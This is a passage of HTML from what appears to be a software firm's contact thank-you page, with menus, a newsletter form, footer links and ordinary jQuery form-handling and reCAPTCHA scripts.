                           <li><a href="https://www.ncriptech.com/sims"><i icon="arwR4"></i> SIMS4.0</a></li>
                           <li><a href="https://www.ncriptech.com/ehm"><i icon="arwR4"></i> EHM</a></li>
                           <li><a href="https://www.ncriptech.com/flexibook"><i icon="arwR4"></i> FLEXIBOOK</a></li>
                        </ul>
                        <ul class="menu__item--sub industries-new-menu arrow--cta" role="list">
                           
                           <li><a href="https://www.ncriptech.com/impulse"><i icon="arwR4"></i> IMPULSE</a></li>
                           <li><a href="https://www.ncriptech.com/thinktank"><i icon="arwR4"></i> THINKTANK</a></li>
                           <li><a href="https://www.ncriptech.com/cloudcampus"><i icon="arwR4"></i> CLOUD CAMPUS</a></li>
                           <li><a href="https://www.ncriptech.com/sims"><i icon="arwR4"></i> SIMS4.0</a></li>
                           <li><a href="https://www.ncriptech.com/ehm"><i icon="arwR4"></i> EHM</a></li>
                           <li><a href="https://www.ncriptech.com/flexibook"><i icon="arwR4"></i> FLEXIBOOK</a></li>
                        </ul>
                        <ul class="menu__item--sub industries-new-menu arrow--cta" role="list">
                           <li><a href="https://www.ncriptech.com/flexibook"><i icon="arwR4"></i> FLEXIBOOK</a></li>
                        </ul>
                     </div>
                     
                  </div>
               </nav>
               <div class="nav--content">
                  <div class="close--content">
                     <i icon="arwR"></i>
                  </div>
                  <div id="CustomerExperience">
                     <div>
                        <div class="menu-heading-marquee">
                           <span>
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           Mobile Application Development
                           </span>
                        </div>
                        <ul class="arrow--cta" role="list">
                           <li><a href="https://www.ncriptech.com/android-application-services"><i icon="arwR"></i> Android Application Development</a></li>
                           <li><a href="https://www.ncriptech.com/ios-application-services"><i icon="arwR"></i> IOS Application Development</a></li>
                           <li><a href="https://www.ncriptech.com/crossplatform-application-services"><i icon="arwR"></i> Cross Platform Application Development</a></li>
                           <li><a href="https://www.ncriptech.com/custom-software-development"><i icon="arwR"></i> Custom Software Development</a></li>
                        </ul>
                     </div>
                     <button type="button" class="c2a c2a--inline c2a--arw bg--blu c--whitee hvr:bg--ylw hvr:c--blak show-on-mobL" href="https://www.ncriptech.com/contact">
                     <span>Request for Quote</span> <i icon="arwR4"></i>
                     </button>
                  </div>
                  <div id="DataGenerativeAI">
                     <div>
                        <div class="menu-heading-marquee">
                           <span>
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           Website Development
                           </span>
                        </div>
                        <ul class="arrow--cta" role="list">
                           <li><a href="https://www.ncriptech.com/web-application-services"><i icon="arwR"></i> Web Application Development</a></li>
                           <li><a href="https://www.ncriptech.com/uiux-services"><i icon="arwR"></i> UI/UX Design</a></li>
                           <li><a href="https://www.ncriptech.com/website-services"><i icon="arwR"></i> Website Development</a></li>
                           <li><a href="https://www.ncriptech.com/custom-website-services"><i icon="arwR"></i> Custom Website Development</a></li>
                        </ul>
                     </div>
                     <button type="button" class="c2a c2a--inline c2a--arw bg--blu c--whitee hvr:bg--ylw hvr:c--blak show-on-mobL" href="https://www.ncriptech.com/contact">
                     <span>Request for Quote</span> <i icon="arwR4"></i>
                     </button>
                  </div>
                  <div id="ApplicationEngineering">
                     <div>
                        <div class="menu-heading-marquee">
                           <span>
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           Digital Marketing
                           </span>
                        </div>
                        <ul class="arrow--cta" role="list">
                           <li><a href="https://www.ncriptech.com/seo-services"><i icon="arwR"></i> Search Engine Optimization</a></li>
                           <li><a href="https://www.ncriptech.com/facebook-marketing-services"><i icon="arwR"></i> Facebook Advertising Marketing</a></li>
                           <li><a href="https://www.ncriptech.com/smo-services"><i icon="arwR"></i> Social Media Optimization</a></li>
                           <li><a href="https://www.ncriptech.com/ecommerce-marketing-services"><i icon="arwR"></i> E-commerce Marketing Services</a></li>
                        </ul>
                     </div>
                     <button type="button" class="c2a c2a--inline c2a--arw bg--blu c--whitee hvr:bg--ylw hvr:c--blak show-on-mobL" href="https://www.ncriptech.com/contact">
                     <span>Request for Quote</span> <i icon="arwR4"></i>
                     </button>
                  </div>
                  <div id="ModernizationStrategies">
                     <div>
                        <div class="menu-heading-marquee">
                           <span>
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           Custom Software Development
                           </span>
                        </div>
                        <ul class="arrow--cta" role="list">
                           <li><a href="https://www.ncriptech.com/wordpress-services"><i icon="arwR"></i> Wordpress Development</a></li>
                           <li><a href="https://www.ncriptech.com/codeigniter-services"><i icon="arwR"></i> Codeigniter Development</a></li>
                           <li><a href="https://www.ncriptech.com/magento-services"><i icon="arwR"></i> Magento Development</a></li>
                           <li><a href="https://www.ncriptech.com/opencart-services"><i icon="arwR"></i> Opencart Development</a></li>
                        </ul>
                     </div>
                     <button type="button" class="c2a c2a--inline c2a--arw bg--blu c--whitee hvr:bg--ylw hvr:c--blak show-on-mobL" href="https://www.ncriptech.com/contact">
                     <span>Request for Quote</span> <i icon="arwR4"></i>
                     </button>
                  </div>
               </div>
            </div>
         </div>
         
         <div id="smooth-wrapper" class="fl-left w-100p" scroll-section>
            <div id="smooth-content">
               <main class="mt-0 bg--white">
                 
                  <!-- Main Content Area  -->
                  <section
                        class="sundew__inner-footer-cta bg--whitee c--blak margin-top-minus pt-0 mb-0 mpb-0"
                        >
                        <div class="inner-container" style="align-content: center; margin-top : 5rem">
                              
                           <img src="frontend/assets/img/common/thankyou.png" alt="">
                            <article class="c--blak pb-0 mpb-0">
                                <h6 class="wrap text-uppercase h6-2025">
                                    <span class="quote">We'll soon be in Touch</span>
                                </h6>
                                <h5>
                                    Thank you for reaching out to
                                    <span class="c--blu">"Ncriptech"</span> We’ve received your details and our team will get back to you shortly. In the meantime, sit back and relax — we’ll be in touch soon. See you !
                                </h5>
                                <a href="https://www.ncriptech.com" class="c2a c2a-arw c2a--inline outline c--blak hvr:bg--sundewblu hvr:c--whitee radius:expandedX2 b-0 " style="margin-top: 1rem;">Back To Home <i icon="arwR"></i></a>
                            </article>
                        </div>
                  </section>


                    <!-- Footer Section  -->

                    <footer class="sundew__footer light-bg margin-top-minus c--blak bg--whitee pt-0-1000" id="footer">
                  <div class="mainX2-container">
                     <div class="inner-container">
                        <div class="footer--three-grid">
                           <div class="footer--subscribe flow-root">
                              <h4 class="grid--head fw--r">Connect with Ncriptech!</h4>
                              <p class="h4 c--blak">Subscribe to stay up-to-date on the technologies defining today and shaping tomorrow!</p>
                              <form class="form-style white__theme actv" id="newsletterForm">
                                 <div class="form-element">
                                    <label class="form-label">Name</label>
                                    <input autocomplete="off" class="form-field validfield removeemoji toUpperCase" aria-label="Name" type="text" name="news_name">
                                 </div>
                                 <div class="form-element ">
                                    <label class="form-label">Work Email</label>
                                    <input autocomplete="off" class="form-field validemail removeemoji" aria-label="Work Email" type="email" name="news_email" inputmode="email">
                                 </div>
                                 <div class="form-checkbox">
                                    <label>
                                       <input type="checkbox" name="check_noti">
                                       <span class="checkmark"></span>
                                       <p>Yes, you can email me and process my data for marketing purposes.</p>
                                    </label>
                                 </div>
                                 <button class="c2a bg--blu c--whitee hvr:bg--blak hvr:c--whitee c2a--inline b-0 move-to--nxt-frm ml-auto radius:expandedX2 newsbtn" type="submit">Sign Up</button>
                              </form>
                           </div>
                           <div class="quick--links">
                                <img src="frontend/assets/img/common/footer/footer.webp" alt="best-software-development-company" title="Best Software Development Company">
                            </div>
                            <div class="industry--links hide-on-mobL">
                                <h4 class="grid--head with-separator"><span>Our Products</span></h4>
                                <ul class="f__list arrow--cta" role="list">
                                    <li><a href="https://www.ncriptech.com/interface"><i icon="arwR"></i> Interface</a> </li>
                                    <li><a href="https://www.ncriptech.com/mobidev"><i icon="arwR"></i> Mobi Dev</a> </li>
                                    <li><a href="https://www.ncriptech.com/codex"><i icon="arwR"></i> Codex</a> </li>
                                    <li><a href="https://www.ncriptech.com/keywords"><i icon="arwR"></i> Keywords</a> </li>
                                    <li><a href="https://www.ncriptech.com/pixelplus"><i icon="arwR"></i> Pixel Plus </a> </li>
                                    <li><a href="https://www.ncriptech.com/impulse"><i icon="arwR"></i> Impulse</a> </li>
                                    <li><a href="https://www.ncriptech.com/thinktank"><i icon="arwR"></i> Thinktank</a> </li>
                                    <li><a href="https://www.ncriptech.com/cloudcampus"><i icon="arwR"></i> Cloud Campus</a> </li>
                                    <li><a href="https://www.ncriptech.com/sims"><i icon="arwR"></i> Sims4.0</a> </li>
                                    <li><a href="https://www.ncriptech.com/ehm"><i icon="arwR"></i> EHM</a> </li>
                                    <li><a href="https://www.ncriptech.com/flexibook"><i icon="arwR"></i> Flexibook</a> </li>
                                </ul>
                            </div>
                           <div class="footer--contact colspan-2">
                              <div class="mails">
                                 <a href="mailto:sales@ncriptech.com"><i icon="email"></i> <span>Sales</span></a>
                                 <a href="mailto:ncriptech@gmail.com"><i icon="email"></i> <span>Support</span></a>
                                 
                              </div>
                              <ul class="sundew__social--links">
                                 <li><a class="c--facebook" target="_blank" href="https://www.facebook.com/ncriptechglobal/"><img src="frontend/assets/img/icons/social-new/facebook.svg" alt="Facebook" title="Facebook"><span>Facebook</span></a></li>
                                 <li><a class="c--instagramorange" target="_blank" href="https://www.instagram.com/ncriptechglobal/"><img src="frontend/assets/img/icons/social-new/instagram.svg" alt="Instagram" title="Instagram"><span>Instagram</span></a></li>
                                 <li><a class="c--linkedin" target="_blank" href="https://www.linkedin.com/company/ncriptech/"><img src="frontend/assets/img/icons/social-new/linkedin.svg" alt="LinkedIn" title="LinkedIn"><span>LinkedIn</span></a></li>
                                 <li><a class="c--twitter" target="_blank" href="https://x.com/ncriptech"><img src="https://sundewsolutions.com/frontend/assets/img/icons/social-new/x.svg" alt="Twitter" title="Twitter"><span>Twitter</span></a></li>
                                 
                              </ul>
                           </div>
                        </div>
                        <div class="footer--company">
                           <!-- D&B seal -->
                           <div class="text-left">
                            <figure class="logo_img">
                                <img src="frontend/assets/img/common/footer/make-in-india.png" alt="make-in-india" title="Make in India">
                                <img src="frontend/assets/img/common/footer/since-2009.jpg" alt="15-years-of- excellence" title="15 years of excellence">
                                <img src="frontend/assets/img/common/footer/msme-logo.png" alt="msme" title="Msme">
                                <!-- <img src="frontend/assets/img/common/footer/bcci.png" alt="bcci" title="Bcci"> -->
                                <!-- <img src="frontend/assets/img/2024_v1/logo5.webp?v=1.1.8" alt="Bengal business council" title="Bengal business council"> -->
                            </figure>
                              <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
                              <script language="JavaScript" src="https://dunsregistered.dnb.com" data-consent-src="https://dunsregistered.dnb.com" data-category-consent="cookie_cat_necessary" type="text/javascript"></script>
                           </div>
                           <!-- ./D&B seal -->
                           <div class="flow-rootx">
                              <!-- <p>An ISO 27001:2022 Certified Company</p> -->
                              <div class="legal--links hide-on-mobL">
                                 <a href="https://www.ncriptech.com/legal">Legal</a>
                                 <a href="https://www.ncriptech.com/terms-and-conditions">Terms & Conditions</a>
                                 <a href="https://www.ncriptech.com/disclaimer">Disclaimer</a>
                                 <a href="https://www.ncriptech.com/privacy_policy">Privacy Policy</a>
                              </div>
                              <p><span style="font-family: arial;">©</span> 2025 <span class="fw--b c--blu">Ncriptech</span>. <br/>All Rights Reserved.</p>
                           </div>
                        </div>
                     </div>
                  </div>
                  <!-- <a class="toTop" aria-label="Go to Top" href="#sundew">
                     <svg xmlns="http://www.w3.org/2000/svg" height="24px" viewBox="0 -960 960 960" width="24px" fill="#000">
                        <path d="M480-120q-8.54 0-14.27-5.73T460-140v-625.46L267.08-572.77q-5.62 5.62-13.27 5.35-7.66-.27-13.5-6.12-5.62-5.61-5.62-13.77 0-8.15 5.62-13.77l217.07-217.07q5.24-5.23 10.7-7.35 5.46-2.12 11.92-2.12t11.92 2.12q5.46 2.12 10.7 7.35l217.84 217.84q5.62 5.62 5.62 13.66 0 8.03-5.62 13.88-5.84 6.62-14.27 6.23-8.42-.38-14.27-6.23L500-764.69V-140q0 8.54-5.73 14.27T480-120Z"/>
                     </svg>
                  </a> -->
                  <button onclick="topFunction()" id="goTopBtn" title="Go to top">↑</button>

                     </footer>

                 
               </main>
               <style>
                  .mobile--cta-N {
                  justify-self: start;
                  margin-top: 1.5em;
                  }
                    @media(min-width: 2560px) {
                    .sundew__swipescroll--heading .h4 {
                    max-width: 1060px !important;
                    }
                    .sundew__swipescroll--heading p {
                    max-width: 765px !important;
                    }
                  }
               </style>
               <svg width="0" height="0">
                  <defs>
                     <linearGradient id="targetSolGrad" x1="0%" x2="100%" y1="0%" y2="0%" gradientTransform="rotate(80)">
                        <stop offset="0%" stop-color="#ff4dd2"></stop>
                        <stop offset="100%" stop-color="#ff993b"></stop>
                     </linearGradient>
                  </defs>
               </svg>
               <script src="https://sundewsolutions.com/frontend/assets/vendors/swiper@8.0.7/swiper-bundle.min.js?v=3.0.0" defer></script>
               <script src="https://sundewsolutions.com/frontend/assets/js/icons.js?v=3.0.0" defer></script>
               <script src="https://sundewsolutions.com/frontend/assets/js/frontend.js?v=3.0.0" defer></script>
               <script src="https://sundewsolutions.com/frontend/assets/js/common.js?v=3.0.00" defer></script>
            </div>
         </div>
         <!-- modal -->
         <div class="sundew-ui--modal size:lg sundew-new-life-company">
            <span class="sundew-ui--modal-bg">
            <i icon="sundew"></i>
            <button type="button" class="sundew-ui--modal-close sds-modal-exit"></button>
            </span>
            <div class="sundew-ui--modal-scroll">
               <div class="sundew-ui--modal-outer">
                  <div class="sundew-ui--modal-inner">
                     <div class="ar-16/9">
                        <video class="company__video" src="https://sdspl.b-cdn.net/USQWS_April2025.mp4" type="video/mp4" controls></video>
                     </div>
                  </div>
               </div>
            </div>
         </div>
         <div class="sundew-ui--modal size:lg " id="team--video">
            <span class="sundew-ui--modal-bg">
            <i icon="sundew"></i>
            <button type="button" class="sundew-ui--modal-close sds-modal-exit"></button>
            </span>
            <div class="sundew-ui--modal-scroll">
               <div class="sundew-ui--modal-outer">
                  <div class="sundew-ui--modal-inner">
                     <div class="ar-16/9">
                        <iframe title="Sundew" frameborder="0" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen></iframe>
                     </div>
                  </div>
               </div>
            </div>
         </div>
         <div class="sundew-ui--modal sundew-new-life size:lg">
            <span class="sundew-ui--modal-bg">
            <i icon="sundew"></i>
            <button type="button" class="sundew-ui--modal-close sds-modal-exit"></button>
            </span>
            <div class="sundew-ui--modal-scroll">
               <div class="sundew-ui--modal-outer">
                  <div class="sundew-ui--modal-inner">
                     <div class="ar-16/9 bg--blak">
                        <video class="company__video" src="https://sdspl.b-cdn.net/OnboardingHRMSvideo_22ndApril.mp4" type="video/mp4" controls></video>
                     </div>
                  </div>
               </div>
            </div>
         </div>

         <script type="text/javascript" src="frontend/assets/js/contact.js?v=3.0.0" defer></script>
         
      </div>
      </div>
      <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <!-- MAIN FORM -->
    <script>
        // AJAX form submission
        $(document).ready(function () {
            $('#contactForm').on('submit', function (e) {
                e.preventDefault(); 
                const formData = $(this).serialize(); 
                const submitButton = $('#submit-button-contact'); 
                submitButton.prop('disabled', true).text('Sending...');
                // Send form data via AJAX
                $.ajax({
                    type: 'POST',
                    url: 'send_email_contact_form.php', 
                    data: formData,
                    success: function (response) {
                        
                        if(response=='ok'){
                            $('#response-message-contact').text(response); 
                            $('#contactForm')[0].reset(); 
                            // submitButton.prop('disabled', false).text('Send');
                            $('#response-message-contact').html('<div style="color:green;">We received you request. Our team will connect with you soon.</div>')
                        }
                        else{
                            $('#response-message-contact').html('<div style="color:red;">Form failed to submit else</div>')
                        }
                        submitButton.prop('disabled', false).text('Let\'s Connect');
                        
                    },
                    error: function () {
                        submitButton.prop('disabled', false).text('Let\'s Connect');
                        $('#response-message-contact').html('<div style="color:red;">Form failed to submit</div>')
                    }
                });
            });
        });
    </script>

    <!-- SUB CATEGORY  -->
    <script>
        $(document).ready(function () {
            // Define subcategories for each service
            const subcategories = {
                "Mobile Application Development": [ // Mobile Application Development
                    { value: "IOS Application Development", text: "IOS Application Development" },
                    { value: "Android Application Development", text: "Android Application Development" },
                    { value: "Cross-Platform App Development", text: "Cross-Platform App Development" },
                    { value: "Custom Application Development", text: "Custom Application Development" }
                ],
                "Digital Marketing": [ // Digital Marketing
                    { value: "Web Application Development", text: "Web Application Development" },
                    { value: "UI/UX Design", text: "UI/UX Design" },
                    { value: "Website Development", text: "Website Development" },
                    { value: "Custom Website Development", text: "Custom Website Development" },
                ],
                "Website Development": [ // Website Development
                    { value: "SEO", text: "SEO" },
                    { value: "SMO", text: "SMO" },
                    { value: "Facebook Marketing", text: "Facebook Marketing" },
                    { value: "E-Commerce Marketing", text: "E-Commerce Marketing" },
                    ],
                "Custom Software Development": [ // Custom Software Development
                    { value: "Wordpress Development", text: "Wordpress Development" },
                    { value: "Magento Development", text: "Magento Development" },
                    { value: "CodeIgniter Development", text: "CodeIgniter Development" },
                    { value: "OpenCart Development", text: "OpenCart Development" },
                ],
            };
    
            // Handle service selection
            $('select[name="contact_category_id"]').on('change', function () {
                const selectedService = $(this).val(); // Get selected service value
                const subCategorySelect = $('select[name="contact_subcategory_id"]');
    
                if (subcategories[selectedService]) {
                    // Enable subcategory field
                    subCategorySelect.prop('disabled', false);
    
                    // Clear existing options
                    subCategorySelect.empty();
    
                    // Add a placeholder option
                    subCategorySelect.append('<option value=""></option>');
    
                    // Add new subcategory options
                    subcategories[selectedService].forEach(sub => {
                        subCategorySelect.append(
                            `<option value="${sub.value}">${sub.text}</option>`
                        );
                    });
                } else {
                    // If no subcategories, disable and clear the field
                    subCategorySelect.prop('disabled', true).empty();
                    subCategorySelect.append('<option value="">No Sub Categories Available</option>');
                }
            });
        });
    </script>

    <script>
        // Function to check if the form and CAPTCHA are completed
        function checkFormCompletion() {
            const firstName = document.getElementById('first_name').value.trim();
            const lastName = document.getElementById('last_name').value.trim();
            const city = document.getElementById('city').value.trim();
            const email = document.getElementById('email').value.trim();
            const country = document.getElementById('country_id').value; 
            const contact_category_id = document.getElementById('contact_category_id').value; 
            const country_code = document.getElementById('country_code').value; 
            const contact_number = document.getElementById('contact_number').value; 
            const message = document.getElementById('message').value; 
            
            const captchaResponse = grecaptcha.getResponse();
        
            const submitButton = document.getElementById('submit-button-contact');
        
            // Check if all required fields are filled and CAPTCHA is completed
            if (firstName && lastName && city && email && country && contact_category_id && country_code && contact_number && message && captchaResponse.length > 0) {
                submitButton.disabled = false;
            } else {
                submitButton.disabled = true;
            }
        }
        
        // Event listener to check form completion when the user interacts with the form
        document.getElementById('contactForm').addEventListener('input', checkFormCompletion);
        
        // Check CAPTCHA response when it's solved
        grecaptcha.ready(function() {
            grecaptcha.enterprise.addEventListener('captcha-success', function() {
                checkFormCompletion();
            });
        });
        checkFormCompletion();

        // Form submission handler
        document.getElementById('contactForm').addEventListener('submit', function(event) {
            event.preventDefault(); // Prevent form submission

            grecaptcha.reset();


            // Optionally, disable the submit button again after resetting
            document.getElementById('submit-button-contact').disabled = true;

        });
    </script>

   </body>
</html>

MMCT - 2023